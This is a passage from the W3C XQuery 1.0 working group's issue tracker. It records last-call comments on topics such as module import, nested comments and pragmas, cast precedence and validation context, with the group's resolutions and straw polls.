namespaces (rather than namespace prefixes) and permit function declarations to assume the default function namespace. [1] Mary: the text no longer talks in terms of prefixes, so I'm happy to consider 836-01 closed. Query Lang [4.12] Function Declaration prefix vs. namespace. "The declared function name in a function declaration must be a QName with a non-empty namespace prefix. If the namespace prefix of a declared function name is empty, a static error is raised.[err:XQ0045]" This restriction as stated should be that the _namespace_ be non-empty. If a default function namespace is in effect in the module, it seems that the logical thing to do would be to apply it equally to function definitions. subsumed by qt-2004Jan0083-01 (already closed) Don: Q7a (qt-2004Feb0834-01) has been fixed So: qt-2004Feb0834-01 accepted and processed: so RESOLVED and CLOSED by editorial tweak made by Don Query Lang [4.8] Schema Import It does not appear to be possible to import a schema with no target namespace. The syntax rules require a namespace to be present. Suggest either (1) making the second StringLiteral in the production for SchemaImport optional or (2) adding alternatives that use an explicit "nonamespace" token, e.g. (1) import schema at "nonamespace.xsd"; or, with no location hint: import schema; (2) import schema nonamespace at "nonamespace.xsd"; or, with no location hint: import schema nonamespace; Alternative (2) is more in line with XML Schema's explicit marking on non-namespaced schemas; alternative (1) is simpler. RESOLUTION: This issue is closed without change to documents. It has been overtaken by events. Query Lang [4.9] Module Import "It is a static error if the target namespace of the module to be imported is the same as the target namespace of the importing module. [err:XQ0056]" Request that this sentence be struck. It introduces no useful constraint that is not already covered by existing rules, but introduces a constraint that is highly detrimental to application development. The analogy to imagine here is that a module namespace is a Java package name, and the individual module instances are individual Java classes. This rule is equivalent to saying that each Java class can only import classes in other packages. It can import multiple classes from other packages, but not any from its own package. Consider a complex XQuery application, where the code is partitioned across multiple developers. There are a number of cases where module namespaces do not provide the level of granularity for managing complex code bodies. In these cases, providing the means to partition the namespace across multiple sources, and use the module locations in the intuitive fashion (i.e. a file location locates a file which is syntactically a complete module) provides great benefit. To get the full benefit of this ability to partition an application namespace across multiple sources, the decision to forbid importation of modules from the same namespace should have been reconsidered in the context of the decision to allow imports of the same module namespace from multiple locations. Case 1: Two independent developers, working on different functions. Developer A: selection-lib.xqy module "" Developer B: display-lib.xqy module "" Syntactically each of selection-lib.xqy and display-lib.xqy is a module, and scopes its contents as normal. Application: application.xqy declare default function namespace "" import module "" at "selection-lib.xqy" import module "" at "display-lib.xqy" The application will see the function declarations and variable names declared in either selection-lib.xqy or display-lib.xqy. Any name conflicts will be handled in the usual fashion, raising a static error [err:XQ0037]. We allow this, provided that application.xqy is not itself a module. Case 1b: As above, but there are some shared constants that A and B both require. Developer A: selection-lib.xqy module "" import module "" at "constants.xqy" Developer B: display-lib.xqy module "" import module "" at "constants.xqy" Application: application.xqy as before This is forbidden by the offending sentence. Both selection-lib.xqy and display-lib.xqy will therefore need to repeat the shared declarations, but this will create a name conflict in application.xqy and raise an error. Case 2: Use module to scope function definitions, without introducing need for separate namespace. Support library (protected): application-lib.xqy module "" API: application-api.xqy module "" import module "" at "application-lib.xqy" Application: import module "" at "application-api.xqy" The application only sees the interface defined in application-api.xqy, and not (using normal module scoping rules) the non-API functions in application-lib.xqy. Again, this is ruled out by the offending sentence. JR: Mary H is saying, why can't you import a module with the same NS as the current module. Example from the issue description: module "" import module "" at "constants.xqy" straw poll delete sentence: 1 no change: 4 abstain 5 The chair declared the status quo prevailed Closed, rejected, but logical/physical text adopted, with the following two changes: impl'n dependent -> impl'n defined logical module, physical module: module = logical module module resource for physical module The confusion between schema components and module components was a source of concern expressed by Liam, later also by MichaelR and others. This means that the scope table will change from "global" to The string literals that follow the at keyword are optional location hints, and can be interpreted or disregarded in an implementation-DEFINED way. Each physical resource corresponds to a module resource. A logical module is defined by its namespace URI, and may be defined by a combination of more than one physical module, which must each be a syntactically valid instance of the module production. [err:XQ0060] The editor (Don) will need to check the documents for the term module and change to module resource everywhere. Query Lang [2.5.2] Cannot catch errors Dynamic errors can be raised, for example through fn:error(), but there is no means to catch them. This is a serious deficiency for writing robust applications, as one must take immense pains to ensure that no expression can ever, given any set of data, raise a dynamic error if one wants to produce an application level error result instead of an implementation level one. Suggest: add try $expression catch $variable $expression where the variable binds to the error and is an item This expression will return the value of the try clause unless a dynamic error was raised, in which case it will return the value of the catch clause. Example: A function with a parameter that you want to validate using "validate". If it's not valid, the query blows up and cannot recover, for example, by fixing up the bad data. The query should be able to do some internal recovery. Example: A query performs a division somewhere resulting in an xs:decimal, and it happens to result in an overflow, from which the application could benignly recover. The application should be given that chance. MK: Notes that XSL WG is looking at concrete proposal at the moment, something very similar to this, simple proposal. Expect resolution to consider at F2F. Proposal is to put it in XPath and we technically prefer it there, but we could put it in XSLT, or XQuery could decide not to include that part of XPath. MR: Have just negated a couple of features under no new features. JR: What new information? A: A whole lot of field experience. Information that XSL WG is considering it. JR: If we do do this, would like to go back to the larger proposal from a year ago. Want to be done. Don't drastically change scope of project this late in the game. JS: This is a very important feature. Would want to spend time considering it carefully. RESOLVED: Closed with no action Support: 5 Abstain: 5 Dissent: Mark Logic, Michael Kay (a procedural objection) [General] Input sources There should be a standard mechanism to obtain a vendor-specified "input sequence". For document-oriented repositories this would be something like a list of all documents in the database so input()//foo[bar="x"] would apply the XPath to every document in the database. It could be a specially named variable instead, but since doc() and collection() are functions, it'd be more consistent to use input(). Using a standard mechanism helps query portability. we CLOSED this at yesterday's distributed meeting, by adopting a zero-argument collection function See related comment CER-01 Query Lang [3.1.6, Appendix A] Line-oriented comment syntax Assume the expression: "This is fun :)". How do you comment it out? It is an area loaded with problems, and nesting of comments should be removed . If the goal of nesting comments is to allow the commenting out of large code blocks, it is possible to add back in the # line-oriented commenting mechanism. Modern text editors make it easy to #-mark many lines in a row. Rejected: Although I like line-oriented comments, XQuery and XPath are nowhere else line ending sensitive. I suggest we close this with no action. What's a line? MH: This is really about having two comment syntaxes. Proposal: close without change. Query Lang [2.6.6, 3.1.6, Appendix A] Comments and pragmas The overlap in syntax of pragmas and comments, as well as the nesting of comments creates difficulties and questions about corner cases that are not clear from the text: (1) (: is this a comment? ::) (2) (: can I comment out a (:: pragma ::) like this? :) (3) (: is this a comment? ::) or an error? :) (4) (: what about a partial (:: pragma? :) (5) (:: pragma with a comment (: is this ok? :) or not ::) (6) (:: pragma with a comment (: is this a comment? ::) or an error? :) ::) (7) (:: pragma with a comment (: what about a partial (:: pragma? :) ::) (8) (: commenting out a (: comment :) is confusing :) (9) let $string := "this is just a string :)" (10) (: let $string := "this is just a string :)" :) (11) let $another := "this is another string (:" (12) (: let $another := "this is another string (:" :) Suggest (a) making clear that comments are not allowed inside pragmas and (b) removing nesting of comments. Technically answered as resolution from some other LCCs. But I suggest we use many of Mary's examples directly in the text as illustrations as to the behavior. On the other hand, the group can always reconsider the decision.(1) (: is this a comment? ::) Answer: yes. (2) (: can I comment out a (:: pragma ::) like this? :) Answer: yes. The inner pragma is seen a a comment in this case. (3) (: is this a comment? ::) or an error? :) Answer: error. ANY unbalanced nesting of "(:"/":)" will result in an error. (4) (: what about a partial (:: pragma? :) Answer: ANY unbalanced nesting of "(:"/":)" will result in an error. (5) (:: pragma with a comment (: is this ok? :) or not ::) Answer: it's fine, but inner content is not a comment. (6) (:: pragma with a comment (: is this a comment? ::) or an error? :) ::) Answer: error, "::)" patterns are not allowed in pragma's and extensions. (7) (:: pragma with a comment (: what about a partial (:: pragma? :) ::) Answer: this is fine. (8) (: commenting out a (: comment :) is confusing :) Answer: OK. Trying to comment out a large block with a bunch of other comments in them is even more confusing. (9) let $string := "this is just a string :)" Answer: No error. (10) (: let $string := "this is just a string :)" :) Answer: Error. Yes, this is a limitation of nested comments. (11) let $another := "this is another string (:" Answer: No error. (12) (: let $another := "this is another string (:" :) Answer: Error. Yes, this is a limitation of nested comments. NW: You could use numeric character references. Maybe. Proposal: close without change except that these examples should be in the document. ACTION A-172-02: Scott to make sure these examples occur in the document. Accepted. Appendix A.1 EBNF Technical It looks like that we cannot parse an expression of the form: "1" cast as xs:integer = "1.0" cast as xs:integer. Which is semantically the same as xs:integer("1") = xs:integer("1.0"). Based on the precedence table, I would assume that cast as binds stronger than =, and from a composability point of view, I would also expect to be able to write the above. However, when following the grammar, it looks like the grammar pops out without consuming the =. Here is the parse process: "1" is consumed by Expr->SingleExpr->OrExpr->AndExpr->InstanceOfExpr->TreatExpr->CastableEx pr->CastExpr->ComparisonExpr->RangeExpr->AdditiveExpr->MiltiplicativeExp r->UnaryExpr->UnionExpr->IntersectExpr->ValueExpr->PathExpr->RelativePat hExpr->StepExpr->FilterStep->PrimaryExpr->Literal->StringLiteral Which then pops back to CastExpr that consumes "cast as xs:integer" Then we pop back to the top and realize that we have left overs and raise a parse error. This is also a problem for the related treat as, castable as etc. Hi Michael. Paul wanted me to give high priority to answering this particular issue (original mail at [1]). Since the November document, the WG has agreed to change the precedence of instance-of, treat, castable, and case (in response to a previous issue raised [2] by you). The precedence table is now looking more like: 1 (comma) 2 FLWORExpr, some, every, TypeswitchExpr, IfExpr 3 or 4 and 5 eq, ne, lt, le, gt, ge, =, !=, <, <=, >, >=, is, <<, >> 6 to 7 +, - 8 *, div, idiv, mod 9 unary -, unary + 10 union, | 11 intersect, except 12 instance of 13 treat 14 castable 15 cast 16 ValidateExpr, /, // 17 [ ], ( ) so that these operators bind much more tightly. In the most recent test parser, your expression parses fine: Type Expression: "1" cast as xs:integer = "1.0" cast as xs:integer |QueryList | Module | MainModule | Prolog | QueryBody | Expr | ComparisonExpr = | CastExpr | PathExpr | StringLiteral "1" | CastAs cast as | SingleType | AtomicType | QNameForAtomicType xs:integer | CastExpr | PathExpr | StringLiteral "1.0" | CastAs cast as | SingleType | AtomicType | QNameForAtomicType xs:integer Please let me know if this previously decided issue resolves MS-XQ-LC1-146 in your view. Thanks! -scott [1] [XQuery] MS-XQ-LC1-146 [2] Grammar issue: cast as Yes. This seems to resolve the issue. Thanks Mi See [436] Section 4.12 Function Declaration Technical Please remove the local namespace prefix and URI for functions. It is only a small burden for the user to define his own prefix and it reduces the implementation complexity by not having to special case this local prefix and namespace. (please remove the local namespace prefix and URI for functions) Everyone can live with the status quo. Section 4.12 Function Declaration Technical "An XQuery implementation may augment the type system of [XQuery 1.0 and XPath 2.0 Data Model] with additional types that are designed to facilitate exchange of data with host programming languages": Please make sure that this type is available in the context of the general type system. In particular, make sure that it is placed under either one of xs:anyType, xs:anySimpleType or xdt:untypedAtomic and not under concrete types. Issue closed with xdt:AnyAtomicType as the type to be used. (joint issue) Issue closed with xdt:AnyAtomicType as the type to be used. (joint issue) Section 4.11 Default Collation Declaration Technical "If a Prolog specifies more than one default collation,": How can you specify more than one. We should syntactically only allow one. Issue closed - No changes to the documents at this time. (xquery-only) Issue closed - No changes to the documents at this time. (xquery-only) Section 4.11 Default Collation Declaration Technical "The default collation applies to all functions that require a collation, except the following functions: fn:contains, fn:starts-with, fn:ends-with, fn:substring-before, and fn:substring-after. If one of these functions is called without an explicit collation parameter, it uses the Unicode codepoint collation rather than the default collation.": Why are these functions treated differently. We think that this is more confusing than helpful and request to not special-case them and have them take the default collation as well. because of resolution in Section 4.8 Variable Declaration Technical "If the value provided by the external environment is not compatible with the declared type of the variable, a type error is raised.[err:XP0006]": A static typing implementation cannot do this check at runtime. Therefore, an implementation will need to guarantee that this is an axiomatic constraint. Therefore, we request that this is formulated as a constraint. Jonathan is not aware of such a constraint already existing. So we'd be asking the editors to add one. Don: Constraints don't have errors, so I'll have to take this error away. MR: agreed. Accepted. Don will add the constraint. Section 4.8 Variable Declaration Technical "If an initializing expression cannot be evaluated because of a circularity (for example, it depends on a function that in turn depends on the value of the variable that is being initialized), a dynamic error is raised": This error should be determined and raised statically. gives examples (under 5.E). Agreed that this should be a static error, if it's an error. Sections 4.8/3.8.1 Technical "the static type of the expression must be compatible with the declared static type; otherwise a type error is raised.[err:XP0004]": As in function parameter passing, we should allow the general type promotion and atomization rules to take place for variable assignments. straw poll: for: 2 against: 2 abstain: 6 rejected, not enough support Section 4.7 Module Import Technical We believe that the module import feature is problematic in that is seems not well-enough understood to make it a normative part of the spec even as an optional feature. Can we introduce a category of exploratory features that may change in the next version and does not guarantee backward-compatibility on the recommendation level? straw poll: do we leave modules in our WDs? leave in: 7 remove: 3 Chair rules that the status quo prevails, and modules remain. Section 4.4 Namespace Declaration Technical "However, a declaration of a namespace in the Prolog can override a prefix that has been predeclared in the static context." Please move the exception with the prefix xml up here. ACTION A-216-10 Jonathan to respond to qt-2004Feb0784-01 Section 4.4 Namespace Declaration Technical "unless it is overridden by a namespace declaration attribute in an element constructor.": See our comment MS-XQ-LC1-084. RESOLVED: qt-2004Feb0783-01 is rejected, consistent with our decision on qt-2004Feb0492-01. (IBM-XQ-024) Section 3.7.3.5, Computed PI Constructors: The name expression of a Computed PI constructor should undergo atomization, and should accept values of type xdt:untypedAtomic, in order to be consistent with the name expression of a Computed Attribute Constructor. --Don Chamberlin (IBM-XQ-025) Section 3.9.3, Order By and Return Clauses: The first bulleted list says that each orderspec in an Order By clause must "return values of the same type for all tuples." We should use a different term: "comparable types" rather than "same type", and we should define the term. For the purposes of this rule, all numeric types should be "comparable". The types xs:string and xdt:untypedAtomic should be "comparable". Any atomic type should be "comparable" with its derived types, and two atomic types that are derived from the same base type (or that are both derived from numeric types) should be "comparable". --Don Chamberlin DECISION: qt-2004Feb0775-01 has been accepted by a previous decision and already implemented in the July 2004 draft. (IBM-XQ-023) Section 3.7.3.2, Computed Attribute Constructors: The last paragraph of this section, which says that a computed attribute constructor must not be a namespace declaration attribute, should be deleted. This case is covered by Name Expression Rule 3. However, this rule should be extended to raise an error if the resulting QName has no namespace URI and its local name is xmlns. --Don Chamberlin (IBM-XQ-021) Section 3.7.4, Namespace Nodes on Constructed Elements: In the Note in this section, the second paragraph says that an implementation can choose to assign the default namespace (by generating a namespace declaration with a null prefix) when constructing an element. This is a dangerous thing to do. The string content of the element may contain some names that are intended to be in no namespace. Unexpectedly reassigning the default namespace would cause these names in element content to be interpreted incorrectly. I suggest deleting this paragraph. --Don Chamberlin WG Resolution: delete the 2nd paragraph feb 774 WG Resolution: delete the 2nd paragraph feb 774 (IBM-XQ-022) The following parts of the XQuery document depend on the ability to cast any atomic value into a string: (a) Section 3.7.1.1, Direct Element Constructors--Attributes, Rule 3b. (b) Section 3.7.1.3, Direct Element Constructors--Content, Rule 1d. (c) Section 3.7.3.1, Computed Element Constructors, Content Expression Rule 1. At present, the Functions and Operators document does not permit a QName to be cast into a string. It is clearly not acceptable to be unable to construct any element or attribute that contains a QName. This inconsistency between the XQuery and Functions and Operators documents needs to be corrected. Note that casting a QName into a string is also required by the Serialization document, as noted in comment IBM-SE-015. --Don Chamberlin RESOLVED: CLOSED by adoption of the triple proposal (IBM-XQ-020) Section 3.7.3.5, Computed Processing Instruction Constructors: If the content expression of such a constructor (after atomization) contains the string "?>", a dynamic error should be raised (a processing instruction cannot contain its own delimiter). --Don Chamberlin (IBM-XQ-019) Section 3.7.1.5, Type of a Constructed Element: This section says that a direct element constructor adds the name of the constructed element to the validation context for nested expressions. Does this rule still apply if the direct element constructor has an xsi:type attribute? How can validation context (a static property) be affected by the value of an xsi:type attribute (which can be dynamic)? Similarly, in Section 3.7.3.1, Computed Element Constructors: If the name of the constructed element is computed by an expression (which, after all, is the reason for having a computed element constructor), the validation context for nested expressions is set to "global". This seems likely to cause problems. Suppose that I use a computed element constructor to construct an element named Address, with a nested element named Zipcode. If Address is a computed name, the validation context for the Zipcode element will be "global". But it's likely that the Zipcode element is not defined globally, but only within an Address. Because of examples like this, I am increasingly skeptical of the concept of "validation context". I do not believe that it is well understood. I think we would be well advised to stop trying to validate things that do not have top-level schema definitions, at least in XQuery Version 1. Deferring this complex and poorly understood feature until after XQuery Version 1 would provide us with practical experience that might lead to a more robust design if this feature is found to be needed in a later version. It would also allow us to focus our efforts on more important issues such as defining an update language. My specific proposal is as follows: (a) Eliminate "validation context" from the Static Context. (b) Eliminate ValidationContext (formerly called SchemaContext) from the grammar. (c) Replace Section 3.7.1.5, Type of a Constructed Element, with a new section based closely on as suggested by Michael Kay. This will bring XQuery into alignment with XSLT 2.0. It will also resolve all the questions raised in this comment, including how to deal with xsi:type attributes. The text suggested by Mike is Section 19.2.1 of the XSLT 2.0 document, entitled "Validating Constructed Elements and Attributes". It can be inserted into the XQuery document with minor editing, such as replacing "validation attribute" with "validation mode", replacing "synthetic schema document" with "in-scope schema definitions", and deleting XSLT-specific references such as "xsl:copy-of". (d) Replace Section 3.14, Validate Expressions, with a new section based closely on Sections 19.2.1 and 19.2.2 of the XSLT 2.0 document, which define validation for element and document nodes, respectively. The result of this proposal will be to simplify XQuery, bring it into alignment with XSLT 2.0, resolve the questions raised in this comment, and dispose of Action Item XQUERY-162-03. A related action, which I do not believe to be required by this proposal but which would certainly be consistent with it, would be to eliminate SchemaContextPath from the SequenceType syntax, cleaning up another complex and poorly understood part of the language. --Don Chamberlin ACCEPTED and CLOSED as we abolished validation context; did this in query teleconf 190, June 3rd. [Liam note: missed because of a typo in the issue number] (IBM-XQ-018) Section 3.7.1.3, Direct Element Constructors--Content: This section says that element nodes that are copied by an element constructor retain their namespace nodes. This seems to imply that the copied nodes do not also inherit namespace nodes from their new parent. Is this correct? If so, the copied node may have fewer namespace nodes than its parent. How can such a node be serialized? Does this introduce a dependency on "undeclaration" of namespaces, supported only by Namespaces 1.1? Similarly, in Section 3.7.4, Namespace Nodes on Constructed Elements: Suppose that the namespace prefix "a" is defined in the Static Context. Suppose that a constructed parent element has an attribute named "a:b" but its constructed child element does not use the prefix "a" in any name. According to the rules in this section, the parent element will get a namespace node for "a" but the child will not. Again, how can these elements be serialized? Is this another dependency on Namespaces 1.1? --Don Chamberlin RESOLVED and CLOSED: This has been resolved by inventing yet another prolog declaration that tells constructors whether to copy or not: resolved and decided on the xquery telcon 197 on Jul 28 (cf. also w3c-xsl-query/2004Jul/0028, which was the base from which we made this decision): Don was there (telcon 197, July 28) given an action item A197-01, and it got finally approved on the query meeting n.199 (IBM-XQ-017) Section 3.1.5, Function Calls: Error XP0018, referenced in this section, is just a special case of Error XP0002, which is used in several other places for the same condition. Since Error XP0002 is more general-purpose, we should eliminate XP0018 and change all its references to XP0002. (If retained, XP0018 should be made dynamic rather than static.) --Don Chamberlin RESOLVED and CLOSED (by myraculous agreement between Don and MRys): delete the last sentence of section 3.1.5 (number 4 in the 23 Jul 2004 version) [XQuery] IBM-XQ-017: Delete error XP0018 The above reference seems spurious. This comment was accepted and the change has already been implemented. (IBM-XQ-016) Section 2.1.1, Static Context: Static type analysis of an expression that contains a "dot" (such as ". + 1" or "substr(., 1)") depends on the static type of the context item. But there is no component in the static context for the static type of the context item. Should we add such a component and allow implementations to initialize it (since they are allowed to initialize the context item)? --Don Chamberlin Minutes log just says "This issue is closed" (joint issue) [[accepted]] SECTION 4.12: Function Declaration The section talks about being able to write a function in a host programming language and then declare the function in XQuery as external. However, it is not clear whether the function declaration is required for all external functions or if we are saying its optional. According to appendix C.1, the in-scope functions is augmentable by an implementation which suggests that an implementation may choose to not require a function declaration for each external function. If this is the case, it would be helpful to clearly mention in this section that the function declaration may be optional for external functions. - Steve B. DC (and others) believe it is already clear that the implementation can add functions to the static context on initialization, therefore by definition it is not required to declare all extension functions. (Indeed, if the vendor has automatically added a function to the context, it is an error to add the same function explicitly.) RESOLVED: to close the issue with no action, on the grounds that the spec already says what the comment is asking for. SECTION 2.1.1 : Static contextt The static context has no type information for the context item, consequently it is impossible to do static analysis of expressions that use the context item. - Steve B. Item closed pending further discussion on the default type (item?) as proposed by Andrew. Michael Rys to start on e-mail on the default type proposal. Item closed pending further discussion on the default type (item?) as proposed by Andrew. Michael Rys to start on e-mail on the default type proposal. Discussion on whether item()? makes sense? Can the expression "." ever return the empty sequence? MKay believes not. MRys thinks a static type of "none" would be more appropriate since this will lead to a static error for the query ".". Jerome suggests another formulation: by default "it's not in the context". Andrew thinks this is equivalent to "none". RESOLUTION to qt-2004Feb0700-01: Accepted the proposal in with "item()?" changed to "none". Issue ORA-XQ-374-B is closed. (Note this is an XQuery comment). This is no change to the document, since Don anticipated the WG decision. Don pointed out that in other entries in the table, "none" means there is no default. Here it means that the default is "none". Don will sort this out editorially. SECTION A.2.2: Lexical rules Today's lexical analyser is a 'two-stage' analyzer. The bottom stage, not explicitly mentioned in the Appendix, I will call the raw tokenizer. This stage is responsible for detecting things like NCName and NumericLiteral. The stage above it is responsible for discerning when an NCName is a keyword, and for handling comments, pragmas and must-understand extensions. The design goals that make lexical analysis for XQuery difficult are: no reserved words; nested comments; and the context-sensitivity inherent in supporting direct constructors as a sublanguage with different whitespace and comment rules from the containing language. In a lexical analyzer with reserved words, the keywords can be detected in the raw tokenizer stage. Frequently the raw tokenizer stage also detects and ignores comments. For such a language, a single stage, the raw tokenizer, is sufficient. In languages that only support unnested comments, it is possible to recognize comments as regular expressions. The usual way to recognize regular expressions is with a finite state automaton. XQuery has opted to support nested comments, which means that comments are not a regular expression; instead they constitute a 'context-free' language. The usual way to recognize a context-free language is by adding a stack to a finite state automaton. The current design of the lexical analyzer is with a raw tokenizer that recognizes tokens defined as regular expressions. Since the raw tokenizer is not powerful enough to handle nested comments, comment handling has been pushed into a stage above the raw tokenizer, where there is a stack. This stage has also been given the responsibility for deciding when an NCName is a keyword. However, these two responsibilities are not easily merged in a single stage. The solution propounded so far has been to prohibit comments in those contexts which are necessary to recognize certain keywords. However, prohibiting comments between certain pairs of keywords is a major usability disservice. I think the solution is that the keyword recognizer needs to be at a higher stage than the comment recognizer. There are two ways to do this: 1. Abandon nested comment support. Most high level languages do not support nested comments, so there is ample precedent. Users are accustomed to this restriction. In addition, if it came to a choice between nested comments, and the freedom to put comments anywhere between keywords, I would gladly sacrifice the nested comments, and I think most users would too. Making this decision would mean that comments would be regular expressions, and could be recognized and removed in the first stage, the raw tokenizer. This decision would also simplify the syntax and analysis of comment-like things (pragmas and must-understand extensions). Overall, the decision would be that there is no nesting of comments, pragmas or must-understand extensions in one another. 2. If you really have to have nested comments, then you should go to a three-stage lexical analyzer. The bottom stage would be a raw tokenizer, which would detect (: (:: :) and ::) as tokens. The second stage above would run the stack to determine the boundaries of comments, pragmas and must-understand extensions. Finally, the top stage would recognize keywords. - Steve B. Had phone call with commenter. I think we should reject the suggestions. ScB: Two suggestions: abandon nested comment support or go to a three-stage analyzer. ScB: I don't think we should abandon nested comment support and the three-stage analyzer is an implementation issue. Proposal: close with no action. Accepted. SECTION 3.7.3.1: Computed element constructors Under "content expression" it says that "a new deep copy of each node is constructed...". "Deep copy" is not defined and there is no hot link to it. The word "copy" does not appear in the data model specification, and in the formal semantics the word is only used regarding environments, not nodes. - Steve B. SECTION 3.2: Path expressions It says in the third paragraph after rule [70] that "Each operation E1/E2 is evaluated as follows: expression E1 is evaluated... The sequence of nodes resulting from all evaluations of E2 are combined, eliminating duplicate nodes based on node identity and sorting the result in document order". Later, in section 3.2.1 "Steps", in the last paragraph prior to the final note, it says "If the axis is a reverse axis, context positions are assigned in reverse document order." These two sentences appear to be in contradiction. Either reverse axes result in a sequence that is in forward document order, or the general statement in 3.2 should say that the result is in either forward or reverse document order. - Steve B. Sorting applied at the end of the step. Text is correct. RESOLVED: No change required. Close issue. SECTION 3.5.1: Value Comparisons Bullet 1 says "Atomization is applied to each operand. If the result, called an atomized operand, does not contain exactly one atomic value, a type error is raised.[err:XP0004][err:XP0006]". The definition of atomization (2.3.2) implies that atomization is done during evaluation phase. The words used here "atomic value" also implies that. However, [err:XP0004] is a static type error. Similar statements appear in 3.7.3.1, 3.7.3.2, 3.8.3, and 3.12.3. - Steve B. ++ M.Rys: In certain cases, this error can be detected statically. ++ DECISION: Issue comments/2004Feb/0694 is closed without change to document. Oracle accepts this decision SECTION 3.7.1.1 : Attributes In 3.7.1.1, it states that namespace declaration attributes do not create attribute nodes, and so does 3.7.1.2. However, it is not clear what node namespace declaration attribute creates until 3.7.4 section which states that "A namespace node is created corresponding to each namespace declared in a namespace declaraction attribute...". So a namespace declaraction attribute indeed creates a namespace node. So it would be better if we stated that a namespace declaration attribute creates a namespace node in 3.7.1.1 and 3.7.1.2 or make a cross reference to 3.7.4 . - Steve B. WG Resolution: this has been overtaken by events, as we no longer talk about namespace nodes. SECTION 3.7.3.1: Computed Element Constructors In 3.7.3.1, the content expression of a computed element constructor: the element nodes are given type annotation xs:anyType and attribute nodes are given type annotation xs:anySimpleType. It would be more precise to give type xdt:untypedAtomic to attribute nodes and give type xdt:untypedAny to element node. See previous comments on 3.7.1.3 content for direct element constructor. - Steve B. Changes earlier resolution SECTION 3.7.1.3: Content In 3.7.1.3 Content, 1.d. section, it states that element nodes are given the type annotation xs:anyType and attribute nodes are given the type annotation xs:anySimpleType. It would be more accurate to state that the element nodes are given the type annotation xdt:untypedAny and attribute nodes are given the type annotation xdt:untypedAtomic. ( Please refer to Figure 2: Summary of XQuery Type Hierarchy.) This is because in '3.13 Validate expression' and '3.7.1.5 Type of a constructed element' section, if validate mode = skip, the spec states that element node is given type of 'xdt:untypedAny' and attribute node is given type of 'xdt:untypedAtomic', which appears to be more accurate based on 'Figure 2:Summary of XQuery Type Hierarchy'. So it is better if we make them consistent. However, it seems 1.d. is irrelevant since step 6 performs the same operation. - Steve B. Changes earlier resolution SECTION 3.12.2: Typeswitch Should un-reachable case statements lead to a warning? E.g. case as super-type will make the subsequent case as sub-type unreachable. - Steve B. KK: explains the proposal, it's a request that we should permit a warning if there is dead code. DC: we currently leave warnings entirely up to the implementation. JM: therefore the spec already permits a warning here but does not require it. MK: and I think that's a satisfactory state of affairs. RESOLVED: to close with no action, on the grounds that an implementation is already allowed to raise warnings on this condition. SECTION 3.1.1: How can user defined entities (e.g. those defined in a DTD) be represented in a constructed element? Perhaps a prolog for entity definition? - Steve B. RESOLUTION: Closed with no changes to the document. It should be raised again for V.NEXT. SECTION 3.8.3: Order by and Return Clauses In 3.8.3, the Xquery spec says "The return clause of a FLWOR expression is evaluated once for each tuple in the tuple stream, and the results of these evaluations are concatenated to form the result of the FLWOR expression". The usage of the word 'concatenated' is vague here. Since the XQuery result does not support nested sequences, if a tuple contains a sequence, all the items of the sequence become the items of the sequence for the return clause of the FLWOR expression. So in this sense, the 'concatenation' here really means "Constructing Sequences" as defined in "3.3.1". We should define this concatenation process to be the same as the construction of Sequences specified in 3.3.1. This also implies that the empty sequence in the tuple is dropped as defined in constuction of Sequences. 'concatenation' does not clarify whether the empty sequence is dropped. - Steve B. JR: is saying that "concatenation" is only unclear if nested sequences exist. JM: doesn't read it that way. AE: was taking this as an editorial comment, that the description of the operation was not clear enough. Asks Don if he's sympathetic. JM: has no objection to it being declared editorial. RESOLVED: to make this an editorial item, Don will consider how to improve the wording. The comment is resolved. SECTION 2.6.6.1: XQuery flagger To assist the programmer developing a portable application, the flagger should provide a warning of all dependencies on objects that are not fully specified by W3C specifications. Examples of such dependencies are: - invocation of functions not defined in the fn: namespace - invocation of functions defined in the fn: namespace that have implementation-defined properties (for example, fn:collection and fn:doc) - reference to anything added to the static context as an implementation-defined option. See the table in appendix C.1 that documents implementation-defined extensions to the static context. - Steve B. no more flagger. SECTION 2.6.6.1: XQuery flagger It should be possible to have a reference implementation of a downloadable application that people could use to check whether a particular XQuery expression is fully portable. Such an application would take as input a character string or file, and return a yes or no verdict about the contents of the character string. The application would not execute the query, merely syntax check it. - Steve B. flaggers deleted. SECTION 3.2: Path Expressions In 3.2 explanation of initial / and //, it states that if the context item is not a node, a type error is raised. It should also state that if the context item is undefined, then a dynamic error is raised (unless this is stated in a general way elsewhere in the document). - Steve B. Section 3.1.4 - "Context item expression" - addresses this issue. Issue closed with no change to documents (joint issue) SECTION 3.1.2: Variable References At the end of 3.1.2, it says variable binding is defined on top of a concept "scope". However, there does not seem to be a central place to define the concept of scope in XQuery spec. Instead, its defintion is scattered in each expression which can create variable binding scope. 3.8, 3.11 and 3.12.2 define the scope of a variable explicitly for FLWOR, Quantified Expr and TypeSwitch respectively, however, the scope of a variable is not defined for function call. It would be better if the scope of a variable binding for all kinds of expressions were listed here and made cross references to each kind expression and give some examples too. - Steve B. RESOLVED: decided to take no action. There was a conscious decision to distribute the definition of variable scope, and people feel it works better that way. A detail, the comment says scope is not defined for function parameters, but it is. SECTION 3.12.2: Typeswitch fourth para after the BNF begins: ." I can see the SequenceType specified in CaseClause, but the default clause has no syntax to specify a sequence type (and probably should not). My guess is that the type is the most general (item()*). This needs to be clarified. - Steve B. Various people recalled discussing this. DC: it's a duplicate of a comment from David Ezell 2004Feb1157-01 which we accepted. We have responded to this and implemented it. The resolution was that the static type of the variable in the default clause is that of the expression. RESOLVED: to close this as a duplicat SECTION. no flaggers, no must-understands SECTION D.2: normative references There are normative references for both XML 1.0 and XML 1.1, but when it comes to names, only "Namespaces in XML" is referenced. The latter is a companion to XML 1.0. The correct companion for XML 1.1 is "Namespaces in XML 1.1". - Steve B. The references are all there now. SECTION A.2.2: lexical rules KINDTEST, KINDTESTFORPI, CLOSEKINDTEST, OCCURRENCEINDICATOR and SCHEMACONTEXT states do not allow comments, pragmas or must-know extensions. This seems unnecessarily limiting to forbid these within kind tests. - Steve B. Fix will be fallout from qt-2004Feb0658-01 resolution. | Proposed, recommended, or existing response: | Fix will be fallout from qt-2004Feb0658-01 resolution. Accepted: no specific change here, falls out of resolution for qt-2004Feb0658-01. SECTION A.2.2: lexical rules DEFAULT state table, fifth row, recognizes <"declare" "variable" "$">, changes state to VARNAME and pushes DEFAULT state on the stack. In state VARNAME, after passing over comments, pragmas and must-knows, it transitions to OPERATOR state. The OPERATOR state table only does a popState() for input "}". There are many instances in which a variable name will not be followed by "}". It is not evident that the DEFAULT state pushed on the stack will ever be popped. Stack overflow appears to be a real danger. - Steve B. See [431]. Fixed, as per some other LCCs. Fixed, as per some other LCCs. [[accepted]] SECTION A.2.2: lexical rules It is not clear how these rules enforce the 